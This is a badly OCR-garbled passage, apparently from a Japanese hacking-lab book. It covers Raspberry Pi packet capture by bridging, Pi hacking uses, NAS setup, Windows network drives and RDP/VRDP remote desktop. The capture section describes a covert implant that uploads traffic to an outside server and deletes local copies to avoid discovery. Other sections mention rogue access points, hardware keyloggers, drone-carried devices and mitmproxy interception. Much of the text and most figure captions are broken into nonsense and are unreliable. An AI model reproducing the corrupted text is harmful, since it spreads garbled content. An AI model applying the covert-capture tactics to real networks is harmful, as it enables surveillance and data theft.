output: パイ プ を 閉じ て いま す 」 と 表示 され て 、 プ ロン プ ト が 戻り ます 。 


代 Kali の 仮想 マン シン で ブリ ッ ジ する 

今回 は Kali Pi を ブリ ッ ジ 化し て パケ ッ ト キ ャ プチ ャ を し まし た 。 VirtualBox の 
Kali の 仮想 マシ ン で も 同じ こと が で きま す 。2 つ の USB 型 の 有線 LAN ア ダ プ ター 
を 用 意 し て 、Kali に 認識 きせ ます 。 後 は 、 上 記 の プリ ッ ジ 化 の 方 法 と 同様 で す 。 


@ キャ プチ ャ デー タ を と う 回 収 す る か 

ブリ ッ ジ 化す れ ば 、 有 株 LAN ケー ブル 間 の 通信 を すべ て キャ プチ ャ で きる こと 
が わか り ま し た 。 問題 は キャ プチ ャ デー タ の 回 収 で す 。 タ ー ゲ ッ ト 端 末 が 配置 さ 
れ だ た LAN に アク セス で きれ ば 、SSH で アク セス し て ログ を 回 収 す る だ け で す 。 


*10 : PuTTY 付 属 の plink.exe を 使っ て いま す 。PuTTY を 導入 し て いな い の で あれ ば 、 イ ンス 
トー ル し て くだ さい 。 
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LAN に アク セス で きる 機会 が ほとん ど な い の で あれ ば 、 イ ンタ ーネット 上 に ある 
サー バー へ 定期 的 ある い は 指令 に 応じ し て キャ プチ ャ デー タ を アッ プロ ー ド する 仕 
組み を 設け ます 。 

同時 に 、 ア ッ プ ロー ド 済 み の デ ー タ は Kali Pi か ら 削 除 す る よう に し ます 。 削除 
し な いと 空き 容量 が どん どん な く な り 、 最悪 Kali PP が ハン グ ア ッ プ し て し まい ま 
す 。 そ し て 、 通 信 に 異常 が 発生 し て 、Kali Pi の 存在 が 発覚 する か も し れ ま せん 。 


光 Raspberry Pi の 活用 例 

小型 か つ バ バッテリー 駆動 可能 、 す な わ ち 単体 で 動作 可能 と いう 特徴 を 活か し て 、 
パケ ッ ト キ ャ プチ ャ を 実現 し まし た 。 世界 中 の Raspberry Pi 愛好 家 は 、 他 に も 
様々 な 活用 法 を 発表 し て いま す 。 こ こ で は 、 ハ ッ キ ング と いう 観点 で 、 そ の 活用 
例 の 一 部 を 紹介 し ます 。 


・ 戻 AP を 動作 させ 、 防 水 加 工 し て 野外 に 設置 する 。 

s ハード ウェ アキ ー ロ ガー に する 。 

・ ド ロー ン や ロボ ッ ト に 搭載 し て 、 タ ー ゲ ッ ト の 近隣 まで 移動 させ る 。 例え ば 、 障 
害 物 が あり 、 タ ー ゲ ッ ト の 無線 ネッ トワ ー ク まで アク セス で き な い と いう 状況 
が ある 。 そ の と き 、 中 継 器 (増幅 器 ) を 備え た ロボ ッ ト で 侵入 すれ ば 、 電 波 の 
届く 範囲 が 伸び る ( 図 9-18)。 

・ さらに モバ イル ルー ター を 併用 し て 、 長 距離 の 遠隔 地 か ら 操 作 で きる 。4G 対 応 
の ドロ ー ン も る 登場 し て いる 。 こ れ に より 、 自 由 に ロボ ッ ト を 操作 で きる 。 
snoopy_ng フレーム ワー ク ("11) を 活用 し て 、 ド ロー ン を 制御 し つつ 、 タ ー ゲ ッ 
ト の 情報 を リア ル タ イ ム に 収集 で きる 。 

*・ ロ ボッ ト を 目 立 型 に し て 、 有 脆弱 な 無線 LAN ネ ットワーク を 探し 出す 。 

* 車 で ウォ ー ド ライ ビン グ ("12) する に は 、 ノ ー ト PC で 問題 な い 。Raspberry Pi 
は 小型 で も る た め 、 自転 車 で も ウォ ー ド ライ ビン グ と 同等 の こと を 実現 で きる 。 

*・ 小型 の 周辺 機器 を 揃え て 、 ポ ボー タ ブル の Kali Pi 端末 (ハッ キン グ ス テ ーション ) 
を 作る 。 


*11 : https//github.com/senseposU/'snooDy-ng 
*12 : 自動 車 で 移動 し な が ら 和 無線 LAN の AP を 探す 行為 で す 。 
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図 9.18 Haspberry Pi と ドロ ー ン の 連携 


スマ ホ の 通信 デー タ を キャ プチ ャ する 


スマ ホ の 通信 を パッ シブ キャ プチ ャ する に は 、|tPacketCapture と いう キャ プ 
チャ アプ リ を スマ ホ に イン スト ー ル する 」 と 「mitmproxy や Fiddler な どの HTTP 
Proxy を PC で 動作 させ 、 ス マ ホ の プラ ウザ の ネッ トワ ー ク 設定 で Proxy サー バー 
を 指定 する |] と いう 2 つの アプ ロー チ が あり ます 。 

前 者 の アプ ロー チ は 、 ア プリ の [Capture] ボタ ン を 押す だ け で す 。 こ の アア プリ 
は VPN 接 続 機 能 を 利用 する の で 仮 告 ダ イア ログ が 表示 され ます が 「OK」 を タッ 
プ し ます 。 キ ャ プチ ャ し た ファ イル は 、SD カ ー ド に pcap 形式 で 保存 され ます 。 

後者 の アプ ロー チ は 、HTTP 以 外 を キャ プチ ャ する 場合 に は 向き ませ ん が 、 
キャ プチ ャ だ け で な く 改 ざん や プロ ッ ク が で きま す 。 ス マ ホ に Proxy サーバ ー の 
証明 書 を 組み 込む 必要 が あり ます 。 Fiddler で あれ ば http://ipv4.fiddler:8888 に ア 
クセ ス し ます 。 一 方 、 mitmproxy で あれ ば "mitmproxy-ca-certpem' ファ イル を ス 
マ ホ に 転送 し て 適用 し ます 。 フ ァイル の 転送 に つい て は メー ル で 送っ た り 、PC と 
接続 し た うえ で 次 の コマ ンド を 実行 し た りす れ ば よい で し ょ う 。 


$ adb push </ .mitmproxy/mitmproxy -Ca-Cert.pem /sdcard/ 
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9-2 | NAS の すす め 





ノー ト PC は 、 放 熱性 が 低い た め 、 優 れ た スペ ッ ク を 搭 載 す る こと が 技術 的 に 難 
し く な り ま す 。 さらに 、 拡 張 性 の 問題 か ら 、 デ ー タ PP りや すい と い 
えま す 。 特に 大 容量 の SSD は 費用 が か か り ま す 。 常に 使う わけ で は な い 仮 想 マ シ 
ン に 、SSD の 容量 を 消費 する の は 少々 も っ た いな いと いえ ます 。 これ を 解決 する 
王 な 方 法 は 、 次 の 通り で す 。 


外部 スト レー ジ を 用 意 す る 

外部 スト レー ジ は 比較 的 安価 で 購入 で きま す 。 出先 で ハッ キン グ ・ ラ ボ を 利用 
りー エー ニー ニー ニー サー ニー ツー か ーー 
に 複数 端末 で 使用 する た め に は 、 設 定 に 手間 が か か り ま す 。 


NAS を 導入 する 

LAN 内 の 複数 端末 か ら 同 時 に アク セス で き 
ます 。 ま た 、 バ ッ ク ア ッ プ 目的 に も 利用 で き 
カカ か つ コ ン パ クト で 

デメ リッ ト と し て 、 初 期 癌 入 の コス ト が か か り 、 少 々 の 設定 が 必要 で す 。 ま た 、 
持ち 運ぶ こと は ほぼ 不可 能 で す 。 通常 外部 か ら NAS の 資源 に アク セス する に は 、 
VPN で LAN に 接続 する か 、NAS の 専用 サー ビス を 利用 し ます 。 近年 の NAS は 専 
用 サー ビス が 充実 し て お り 、 ル ー タ ー を 設定 する こと な く NAS 上 の デー タ に アク 
セス で きる よう に な っ て いま す 。 

例え ば 、Synology の ーーーー 人 門 向 け の NAS で す (13)。 ス トレ ー ジ を 2 
内 蔵 で き 、OS は プラ ウザ で 操作 で きる DSM (DiskStation Manager) を 採用 し て 
いま す 。 

DS2161 に は 、QuickConnect 機 能 が あり 、 メ ヌー カー サイ ト か ら 専 用 ID (Quick 
ConnectID) を 取得 する と 、 ル ー タ ー の 設定 な し で イン ター ネッ ト か ら NAS に 接 
続 で きま す 。 mm ブラ ウザ で http:// く <NAS の IP アド レス >:5000 に 
アク セス する と 、 画面 を 表示 で きま す 。 ま た 、 イ ンタ ーネット 経由 で あっ て 
も 、 デ ラッ ウザ で Pe /quickconnect.to/ く ユー ザー 名 >| に アク セス する と 、 管 


、 大 容量 の サイ ズ の も の を 選択 で き 
ます 。 フ ァイル サー バー より も 省 電 


13 : 内 蔵 す る スト レー ジ は 別に 用 意 す る 必要 が ある た め 、 厳 容 に は NAS キッ ト で す 。 
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理 画面 を 表示 で きま す (アプ リ 経 由 で ファ イル に も アク セス 可能 ) ( 図 9-19)。 


アル ことり 月 中 】 ニレ ッ ュ リア ルル アア 4 ご 
に 対応 する URL に アフ セス し ます 。 


替 USiron.ID3.qUiCkconneCt_to 


ユー ザー と グル ー プ DS Audlo 
共有 フォ ル ダ DS Cam 
サー ビス 了 問 | psceug 
スト レー ジマ ネー ジャ ト 4 DS Get 

リソー スモ ニタ ー 過 | psrme 

シス テム 情報 詞 ] osNow 
ファ ー ム ウエ ア 阿 | osPnoe 


IP ブロ ッ ク DS Vigeo 


[ 
アプ リ ( 主 に ファ イル を 操作 
する と き ぎ き に 使用 する ) 





図 9.19 スマ ホ で 管理 画面 を 表示 し た 


どちら の アプ ロー チ も 一長一短 な の で 、 適 材 適 所 で 同時 に 活用 する こと を お す 
すめ し ます 。 NAS に は USB が 内 蔵 され て お り 、 外 部 スト レー ジ ーー 本 ま ます 。 
接続 され た 外部 スト レー ジ に は 、 ネ ットワーク 経由 で 自由 に ア へ でき ます 。 
た だ し 、 ネ ットワーク 経由 な の で 、 デ ー に ーー ニーーー ト こ 安定 性 も 不 
安 が 残り ます 。 そ の た め 、NAS 上 (ある い は NAS に 接続 し た 外部 スト レー ジ ) か 
ら 仮想 マ シン を 起動 する こと は あま りお すす めで きま せん ("14) 。 

そこ で 、 自 宅 や 出先 で ハッ キン グ ・ ラ ボ を 活用 する と き に は 、PC に 外部 スト 
レー ジ を 接続 し ます 。 一 方 、 外 部 スト レー ジ を 主 に デー タ 置 き 場 に する の で あれ 


14 : NAS の 種類 に よっ て は 、NAS 上 に 仮想 環境 を 塞 築 で きま す 。 NAS の スペ ッ ク に 依存 し ます 
が 、 こ ちら の 方 が 安定 し ます 。 ネ ットワーク 経由 で 仮想 マシ ン の ファ イル に アク セス し て 起動 す 
る より 、 仮想 マシ ン が 起動 済み の シス テム に ネッ トワ リー ク 経 由 で アク セス する 方 が 一 般 に 安定 し 
て いる と いえ ます 。 
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ば 、 NAS に 外部 スト レー ジ を 接続 する と 、 LAN 内 の 複数 端末 か ら ア クセ ス し や す 
く な り ま す 。 


凛 NAS の ハー ドウ ェ ア 故 障 か がら の デー タ 復 旧 


NAS の ハー ドウ ェ ア が 故障 し て も 、NAS に 装着 し て いた HDD は 無事 で す 。 し 
か し 、 こ の HDD を NAS か ら 外 し て 、USB 経 由 で PC に 接続 し て も 、 単 純 に サル 
ベ ページ で きま せん 。 

NAS は 単なる 外 付け HDD で は な く 、 小 さき な ファ イル サー バー と し て 動作 する 
OS が イン スト ー ル され て いま す 。 個人 向け の NAS の 多く は 、 Linux が 採用 され て 
お り 、 デ ー タ 保存 用 の パー ティ ショ ン は ext3 で フォ ー マ ッ ト さ れ て いる 可能 性 が 
あり ます 。 つま り 、ext3 を 認識 で き な い OS で は 、 この HDD を 認識 で きま せん 。 こ 
れ を 解決 する 最も シン プル な 方 法 は 、 同 じ 型番 の 新しい NAS に 装着 する こと で 
す 。 ま た 、Linux な ら ext3 を 認識 する の で 、Linux か ら HDD を マウ ント する と い 
2 方 法 も 有効 で す 。 


NAS の 共有 フォ ル ダ ー に アフ セス する 

Windows か ら NAS の 共有 フォ ル ダ ー に アク セス する に は 、 エ クス プロ ー ラ ー を 
開い て 、 UNC (Universal Naming Convention) を 用 いま す 。UNC と は 、 Windows 
ネッ トワ ー ク で 共有 され る 資源 の 位置 を 示す 記法 で あり 、 次 の 書式 で 指定 し ます 。 


yy<TP ア ドレ ス あ る い は コン ピュ ー タ 名 >\< 共 有 フ ォ ル ダー 名 > 


例え ば 、NAS の IP アド レス が 192.168.1.2 で あり 、 共 有 フ ォ ル ダー 名 が 「home」 
で あれ ば 、「 並 半 192.168.1.2\home」 に アク セス し ます 。 

エク スプ ロー ラー か ら ネ ットワーク フォ ル ダ ー を 開い て も アク セス で きま す 
が 、 他 の ネッ トワ ー ク デバ イス も 表示 され る の で 時 間 が か か り ま す 。 そ の た め 、 直 
接 UNC で アク セス し た 方 が 効率 的 と いえ ます 。 


泡 NAS の フォ ル ダ ー に ネッ トワ ー フ ドラ イブ を 割り 当て る 
共有 フォ ル ダ ー に ドラ イブ を 割り 当て る こと で 、 マ ウス 操作 で 指定 の 共有 フォ 
ル ダ ー に 直接 アク セス で きま す 。 
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Windows の 場合 は 、 次 の 手順 で ドラ イブ を 割り 当て られ ます 。 


①) 「 ネ ットワーク ドラ イフ の 割り 当て 」 を 表示 する 
エク スプ ロー ラー の 左 の メニ ュー か ら PC を 選択 し 、[「 コ ンピュータ ー| タプ ブ を 
開き ます 。「 ネ ットワーク ドラ イプ の 割り 当て 」 アイ コン を 押し ます ( 図 9-20)。 


二 示 


「 細 sz 遇 Fe] 回 2025 の アツ イッ ストール と 間 
援 続 と 切 新 ・| の きり 当 て ・ ae を く 〈 庄 三 下 
ネッ トワ ー ク ジス テム 


記 , pc ネッ トワ ー ク ドライ ブ の 重り 当て 


マン 二 2 イ ッ ク 2 ア クセ ス マル ダー( の 


男 デメ ク トッ プ 還 0472r2 ト 還 。 の ン 0- ド 
| 


生 ダウ ン ロ ー ド 
問 ドキ ュ メ ルト 


『 ビ ウ チャ 1 テオ 
慎 に 


) 了 ミュ ー ジ ッ ク 
マデ 敗 イ ス と ドラ イプ (1) 
ロー- カ ル ティ ス 2 (で) 
三 き 靖 域 4 G8/c31 GB 
マツ ネッ トワ ー ク の 場所 (1) 


テス ウト ッ ナ ] ドキ ュ メ リト 
自 





9-20 PC の 表示 画面 


② 共 有 フ ォ ル ダー に ドラ イブ を 割り 当て る 

| ネッ トワ ー ク ドラ イブ の 割り 当て 」 画面 が 表示 され る の で 、 未 使用 の ドラ イプ 
を 選択 し 、 フ ォ ル ダー に UNC を 入力 し ます 。 共有 フォ ル ダ ー 名 が わか ら な けれ 
ば 、[ 参 照 ] ボタ ン か ら 指 定 で きま す 。 次 回 サイ ン イ ン し た と き に も 同じ ネッ ト 
ワー ク ド ラ イブ を 用 いる と き は 、「 サ イン イン 時 に 再 接続 する 」 に チェ ッ ク し ま 
す 。 ま た 、 ド ライ プ ブ を 開い た と き に ユー ザー 名 と パス ワー ド を 入力 し た い 場 合 に 
は 、 | 別 の 資格 情報 を 利用 し て 接続 する ] に チェ ッ ク し ます 。 最後 に [完了 ] ボタ 
ン を 押す こと で 、 設 定 を 反映 し ます ( 図 9-21) 。 
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4 。 培 ネ ッ トリ ー ク ドラ イナ の 判り ヨ て 


居り 当て ある ネットワーク フォルダー を 反 択 し て くだ さい 


反 凌 すう フォ ル ダ ー と ま 用 すう ドラ イブ 文字 を 指定 し くく だ さい < 


ドラ イ 了 (Dj: る 2 
フォ ル ダ ー(0|: \ き 192.168.1.2*hormwe 





全 YYzervershsre 
サイ ソイ ン 百 に 再 琶 盾 する [ 肌 
[1 別 の 吉富 居 下 を 全店 し て 全 湊 する 〇 


Fe, で さき: 





図 9.221 ネッ トワ ー ク ドラ イブ の 割り 当て の た め の 設 定 


3③ ドラ イフ が 割り 当て られ た こと を 確認 する 
PC の 表示 画面 に は 、Z ド ライ ブ が 表示 され て いる は ず で す ( 図 9-22)。 実際 に ア 
クセ ス し て 、NAS の 共有 フォ ル ダ ー 内 の ファ イル が 見 える こと を 確認 し ます 。 


| 3= 


ン フォ ル ダ ー [の 
3D オプ ジェ クト 


4 ドキ ュ メソ ト 
計 


ミュ ー ジ ッ ク 


ンマ テバ イス と ドラ イブ (1) 
ロ - カ ルディ スク (C) 


wp 空き 協 壇 154GB/231G8 
ツン ネッ トワ ー ク の 埋 所 (2) 


iii home [YY192.1681.2) Z] 
SC 3 吉 g 15eTa/s5 TB 





図 9.22 Z ド ライ ブ が 追加 され た 
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ハッ キン グ ・ ラ ボ を 拡充 する アプ ロー チ の 1 つと し て 、 ネ ットワーク 環境 を 
拡張 する こと が 挙げ ほら れ ま す 。 例 えば 、 出 先 か ら 自 宅 LAN に アク セス で きれ 
ば 、 利 便 性 が 向上 する と いえ ます 。 

本 章 で は ハッ キン グ ・ ラ ボ の 観点 か ら 、 ネ ットワーク 環境 を 拡張 する 方 法 に 
つい て 解説 し ます 。 結果 と し て 、 本 書 の テー マ の | つ で ある 「 い つ で も どこ で 
も ハッ キン グ 」 を 実現 で きま す 。 


ュ 


ミミ 








ハッ キン グ ・ ラ ボ の 拡張 





10 1 リモ ー ト デス クト ッ プ に よる 遠隔 操作 





リモ ー ト デス クト ッ プ と は 、 ネ ットワーク を 通じ て 遠隔 地 の 端 末 の デス クト ッ 
プ を 操作 する 機能 の こ と で す 。 リ モー ト デ ス クト ッ プ を 実現 する ソフ トウ ェ ア は 
多数 存在 し ます が 、 代 表 的 な も の と し て 次 が 人 挙げ られ ます 。 


* X Window System : UNIX で 広く 使わ れ て いる 。 

s RDP (Remote Desktop Protocol) : Windows の リモ ー ト デス クト ッ プ 現 格 。 
Microsoft リモ ー ト デス クト ッ プ と も 呼ば れる 。VirtualBox の 仮想 マシ ン も 操作 
で きる 。 

s VNC (Virtual Network Computing) : 各種 ソフ ト が あり 、 様 々 な OS に 対応 し 
て いる 。 


s Chrome リ モー ト デ ス クト ッ プ : Chrome ブラ ウザ の 拡張 機能 を 用 いる 。 
本 章 で は 、RDP と Chrome リモ ー ト デス クト ッ プ に つい て 紹介 し ます 。 


 RDP の 活用 例 
@ ノ フ トウ ェ ア 開 発 に お ける レビ ュー 

復 数 人 に よる ソフ トウ ェ ア 開 発 に つい て 考え て み ま す 。 ソ フト ウェ アテ スト で 
品質 を 担保 する の で は な く 、 レ ビュ ー の 時 点 で 品質 を 向上 させ る と いう 考え 方 が 
あり ます C1)。 

レビ ュー と は 、 仕様 書 や プロ グラ ム と いっ た 成果 物 を 、 開 発 者 や その 他 の 者 が 
検証 すろ る こと で す 。 レ ビュ ー の 時 点 で あれ ば 、 問 題 が 発覚 し て も 手 戻り が 少な く 
な り ま す 。 ま た 、 レ ビュ ー に よっ て 関係 者 に 業務 知識 、 プ ログ ラム の 設計 、 ス キ 
ル な どの 情報 を 共有 で きま す 

開発 者 は 、 作 成 し た プロ グラ ム を 事前 に バー ジョ ン 管 理 ヘ ソース を コミ 
て お きま す 。 そ し て 、 レ ビュ ー の 場 で は 、「 前 回 の レビ ュー 後 の ソ ー ス 」 と 「 今 回 


の レビ ュー 前 の ソー ス 」 の 差分 を 取り 、 そ れ ら の 差分 に つい て レビ ュー を し ます 。 


/ 
Ne 
ーー 


*1 : 適切 な レビ ュー で な けれ ば 、 品 質 は さほど 向上 せ ず 、 時 間 だ け 浪 費 し て し まい ます 





718 | 第 3 部 | ハッ キン グ ・ ラ ボ の 拡張 


こう する こと で 、 レ ビュ ー す べき 人 箇所 を 漏れ な く 抽 出 で き ます C2)。 例え ば 、 前 
回 の レビ ュー に 対す る ソー ス の 修正 内 容 も 抽出 で き 、 そ の 修正 が 適切 か どう か を 
確認 で きま す 。 

打ち 合わ せ の 場 に 設置 し て ある PC (設置 PC と 呼ぶ ) に 、 差 分 を わか りや すく 
表示 する ソフ ト が 導入 され て いる と は 限り ませ ん 。 ま た 、 通 常 、 プ ロジ ェクト ご 
と に 使用 する リポ ジ ト リ は 異な り 、 セ キュ リティ の 観点 か ら 設 置 PC に その 認証 情 
報 を 保存 する わけ に は いき ませ ん 。 そこで 、 設 置 PC か ら 、 自 分 の 作業 机 に ある PC 
に リモ ー ト デス クト ッ プ し ます 。 設置 PC が Windows で あれ ば ぱ ば 、 デ フォ ルト で 備 
わっ て いる 機能 だ け で RDP 接続 で きま す 。 自分 の 環境 に は 開発 環境 が 導入 済み の 
は ず な の で 、 す ぐに ソー ス の 差分 を 表示 で きま す 。 


@ ゲー ム や 動画 を と こ で も 楽し む 

メイ ン PC で 利用 し て いる コン テン ツ を どこ で も 楽し みた いと いっ た 状況 で 、 リ 
モー ト デ ス クト ッ プ は 活躍 し ます 。 例 えば 、 寝室 、 台 所 、 風 呂 場 で 、 メ イン PC に 
イン スト ー ル され て いる ゲー ム を 楽し みた いと し ます 。 タ プレ ッ ト に リモ ー ト デ 
スク トッ プ 用 の クラ イア ント を 民 入 し て 、 メ イン PC に アク セス すれ ば よい わけ で 
す 。 動画 の 再生 な ども 同様 に し て 実現 で きま す 。 特 に Windows で し か 再生 で き な 
い 形 式 の 動画 で も 、 リ モー ト デ ス クト ッ プ を 通じ て タブレット や スマ ホ で 再生 で 
さま す 。 


 RDP 接続 環 境 を 構築 する 


接続 する 側 (遠隔 操作 する 側 ) を クラ イア ント 、 接 続き され る 側 を ホス ト と いい 
ます 。 ま ず ホ スト を 設定 し 、 そ の 後 で クラ イア ント で 接続 を 確認 し ます ( 図 10-1)。 


2 : 機械 的 に 抽出 する 方 法 を 用 いな いと 、 開 発 者 が 意図 的 ある い は 意識 せ ず に 成果 物 を 隠蔽 する 
と いう 状況 が 起こ りか ね ませ ん 。 
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RDP ク ライ アン ト RDP サ ー バ ー (ホス ト ) 





10-1 RDP 接 続 の 環境 


人 @ 接続 され る 側 を 設定 する 


RDP 接 続 さ れる Windows 端 末 は 、 上 位 エ ディ ショ ン (Pro 以 上 ) で な けれ ば な 
り ま せん 。 そ し て 、RDP 接 続 を 受け 付け る よう に 設定 し て お く 必 要 が あり ます 。 
ここ で は Windows 10 Pro で の 設定 方 法 を 解説 し ます 。 事 前 に 、 次 の よう に 設定 し 
ます 。 


①RDP 接続 を 許可 する 

シス テム 画面 の 左側 の メニ ュー か ら 「 リ モー ト の 設定 」 を 選び ます 。 

「 シ ステ ム の プロ パテ ィ 」 画面 が 開く の で 、「 リ モー ト 」 タプ を 選択 し て 、「 こ の 
コン ビ ピュー ター へ の リモ ー ト 接続 を 許可 する 」 を 選択 し ます ("3)。 そ し て 、 そ の 
下 の 「 ネ ットワーク レベ ル 認 証 で り リモ ー ト デス クト ッ プ を 実行 し て いる コン 
ビ ピュー ター か ら の 接続 を 許可 する 」 も チェ ッ ク し ます ( 図 10-2)。 


3 : Windows 7 より 前 の Windows で は 、 ネ ットワーク レベ ル 認 証 (NLA) を サポ ー ト し て いま せ 
ん 。NLA を サポ ー ト し て いな い 端 末 で RDP 接 続 を 許可 する と き は 、[「 リ モー ト デ ス クト ッ プ を 実 
行 し て いる コン ピュ ー タ ー か ら の 接続 を 許可 する 」 を 選択 し ます 。 
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ッ ス テム めげ ロリ ルル ティ 
コッ ピュ ーー 名 ルー ドリ ェ ア 評 軽 誤 定 シス テル 記 件 請 リモ ー ト 
モー ト ア シュ タッ ス 


切 に の ピュー ター へ も り モ ー ト アシ スタ ンス 倒 疲 を 生 可 す 人 


りり モー トチ スウ トッ プ 

4 ブシ ョ ッ を 圭 四 し 、 逢 醒 で き S ユ ー ザ = を 手 定 し て くだ さい 。 
〇 この コン ビュー ター へ の り モ ー ト 失 破 を 叶 可 し WiD 
ご 0 コ ッ ピ ュー ター へ あり モー ト 控 訴 を 特 可 す 3( 


ーー ティ ーーー ンー トコ テー# ら 
み 琶 紅 を 困 可 すう 





図 10.2 「 リ モー ト 」 タブ に お ける 設定 


② 接続 する ユー ザー を 選択 する 

[ユー ザー の 選択 ] ボタ ン を 押す と 、「 リ モー ト デ ス クト ッ プ ユー ザー」 画面 が 
表示 され ます ( 図 10.3)。 こ こ で 接続 する ユー ザー を 登録 し ます (4)。 た だ し 、 
Administrators グ ルー プ の メン バー は 、 明 示 的 に 登録 し て いな く て も 接続 で きま 
す 。 こ こ で は 「 ア クセ ス が 既に 与え られ て いま す 」 と 出 て いる ユー ザー で 接続 す 
る の で 、 設 定 は 不要 で す 。 も し 、 そ れ 以 外 の パタ ー ン で あれ ば 、[ 追 加 ] ボタ ン か 
ら コ ユー ザー を 登録 し ます 。 


リモ ー ト テス ケト ッ プ ユー ザー # X 


下り 一 角 に きま や さ れ て いさ コー ザー は に ゆ コ ンド ュー ザー に 党 結 で きま す 。 Ammittraloes ゲ 
上 ルーブ の メン ルー な 、 一 覧 に 二 示 され て いな て く て も 入 大 で きよ す 。 


放ち rrn に は チク セ ユ ぎ ぜ 婚 に ほえ られ て いま す 。 


| WDD。 | | 前 


辻 し い ユ ー ザ ー アカ ウン ト を 作成 し た り 、 ユー ザー を 人 $ 箇 グル ー に 閣 作 し た りす っ に は コッ ト 
0- ル ルネ の | ユー ザー テリ 2 ント 舞い て くだ さい 





図 10-3 接続 する ユー ザー の 指定 


*4: ユ ー ザ ー ア カウ ント に は パス ワー ド が 設定 され て いる 必要 が あり ます 。 
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最後 に [IOK] ボタ ン を 押し て いき 、 設 定 を 反映 させ ます 。 


氏 RDP で 接続 する 
Windows 10 に は RDP 接 続 す る クラ イア ント ソフ ト が 標準 搭載 され て いま す 。 


Home エ ディ ショ ン で あっ て も そう で す 。 
1) | リモ ー ト デス クト ッ プ 接続 」 画面 を 表示 する 

スタ ー ト メニ ュー か ら 「Windows ア クセ サリ 」 > 「 リ モー ト デ ス クト ッ プ 接続 」 
を 選び ます 。 ま だ た は | ファ イル 名 の 検索 ]」 で |mstsc」 を 入力 し ます 。 す る と 、| リ 
モー ト デ ス クト ッ プ 接続 」 画面 が 表示 され ます ( 図 104)。 こ れ が RDP ク ライ アン 
ト に 相当 し ます 





EDE 上 コテ ルン に ジア た 
画面 が 表示 され ます 。 


②「 リ モー ト デ ス フク トップ 
に さ 19 と 二 ' だ 


「mstsc」 と 入力 し ます 。 


に 肖 部 3 坦 


図 10.4 「 リ モー ト デ ス クト ッ プ 接続 」 画面 の 表示 





2 )RDP 接続 する 

ホス ト の IP アド レス ある い は コン ピュ ー タ 名 を 入力 し ます 。 

資格 情報 を 要求 され た ら 、 ユ ー ザ ー 名 と パス ワー ド を 入力 し て 、 「 資 格 情 報 を 記 
憶 す る 」 に チェ ッ ク を 入れ て [OK] ボタ ン を 押し ます ., 

[| この リモ ー ト コン ビュー ター の D を 識別 で きま せん 」 と いう 警告 画面 が 表示 
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され ます が 、[ は い ] ボタ ン を 押し ます ( 図 10-5)。 


巧 | リモ ー ト デア スワ トップ 答 誠 


この 閲 題 は 、 リモ ー ト コソ ビュー ター が Windows Vista より 生 の 人 パー ジョ ソ の Windows を 室生 
L て いる か 、 また は り モー ト コッ ビュー ター ザ サ ー バ - 許 症 を サポ ー ト すさ よう に 府 茂 まれ て いな いい 電 
会 に 先生 する "と が あり ます 。 


サ 各 - ト が 室 な 堪 合 は 、 ネッ トリ ワーク 菅 理 者 また は リモ ー ト コン ピュー ダー の 所 大 者 に 問い 合 
わせ て くだ さい 。 


| ] こ の コッ ピュ ー タ ー ハ m 技 章 に つい て 後 牌 写し な いけ 





10-5 RDP 接 続 時 の 驚 告 画面 


RDP 接 続 に 成功 する と 、 ホ スト の デス クト ッ プ が 表示 され ます 。 

な お 、RDP ク ライ アン ト の バー ジョ ン が 古 す ぎる と 、 接 続 が 拒否 され る こと が 
あり ます 。 そ の 場合 は 、 Microsoff の サイ ト か ら 最 新 の RDP ク ライ アン ト を ダウ ン 
ロー ド し て 使用 し ます 。 


沙 Kali の 仮想 マシ ン に VRDP 接続 する 


VirtualBox に は VRDP が 備わっ て いま す 。VRDP (Virtual RDP) と は 、 仮 想 マ 
シン を リモ ー ト デス クト ッ プ する プロ トコ ル で す 。 つ まり 、RDP ク ライ アン ト に 
より 、 仮 想 マ シン の デス クト ッ プ を 操作 で きま す 。 


* Extension Pack を イン スト ー ル する こと で 、VRDP が 使用 で きる 。 

*VRDP の アク セス は ゲス ト OS に 対し て で は な く 、 ホ スト OS に 対し て 行う 
(*5) 。 

*・ ゲ スト OS に RDP サ ー バ ー を イン スト ー ル する 必要 が な い 。 


ここ で は 、Kali の 仮想 マシ ン に VRDP 接 続 する 方 法 を 紹介 し ます 。 環境 は 図 10-6 
の よう な 状況 と し ます 。 


*5 : 誤解 され る こと が あり ます が 、RDP ク ライ アン ト が ホス トト OS に アク セス で きれ ば 十分 で す 。 
その た め 、 仮 想 マ シン の 仮想 LAN ア ダ プ ター に NAT を 割り 当て て も 問題 あり ませ ん 。 
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(《⑯) 






192.168.1.101 


タブ レッ ト 
IPad 


10-6 VRDP 接 続 の 実験 環境 


① 仮 想 マ シン の 設定 を 変更 する 

Kali の 仮想 マシ ン を 終了 し ます 。 

仮想 マシ ン の 設定 画面 を 開き ます 。 左 ペイ ン で | ディ スプ レイ 」 を 選び 、| リ 
モー トディ スプ レイ 」 タプ を 選び ます 。 そ の 画面 で 「 サ ー バ ー を 有効 化 ] に チェ ッ 
ク を 入れ ます 。 

「 サ ー バ ー の ポ ボート 番号 ] は デフ ォ ル ト で 3389 に な っ て いま す が 、3390 に 変更 し 
ます 。 なぜなら ば ホス ト OS が Windows で あり 、RDP サ ー バ ー の ポー ト 番 号 と 競 
合 す る た めで す 。 

「 認 証 方 式 ] で Null を 指定 する と 、 パ スワ ー ド な し で アク セス で きま す 。 


②) 仮 想 マ ン ン で VRDP 接続 する 

Kali の 仮想 マシ ン を 起動 し ます 。 

最初 の 実験 と し て 、 ホ スト OS の Windows 10 か ら Kali に VRDP 接 続 し て み ま 
す 。「 リ モー ト デ ス クト ッ プ 接続 」 画面 を 表示 し て 、 コ ンピュータ 欄 に 
「localhost:3390] と 入力 し て [接続] ボタ ン を 押し ます ( 図 10-7)。 
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昌 り モ ー ト デス クト ッ プ 挫 続 


| 着 リモ ー ト デス クト ッ プ 


コソ ビ ピュー ター- し | alhosk ミ 3 


ユー ザー 条 : 指定 され て いま せん 


接 読 府 に は 真相 情報 を 要求 され ます 。 


ES 
YJ 7 プシ ジョ フ 0 才 未 ( ロ ) 





図 10-7 「 リ モー ト デ ス クト ッ プ 接続 」 画面 


「 この リモ ー ト コン ピュー ター の DD を 識別 で きま せん 」 と いう 警告 画面 が 表示 
され ます が 、[ は い ] ボタ ン を 押し ます 。 す る と 、RDP ク ライ アン ト で Kali の デス 
クト ッ プ が 表示 され ます ( 図 108 の 左上 の 表示 に 注目 )。 そ し て 、 通常 の 揉 作 が で 
さる こと を 確認 で きま す 。 


寺 ocsihost コ 0 - リモ ー ト デス ワウ トップ 生計 


| 
ER 丘 。 
い DL MX 


ィ さ | (だ マ 


root 加 Ki: < 
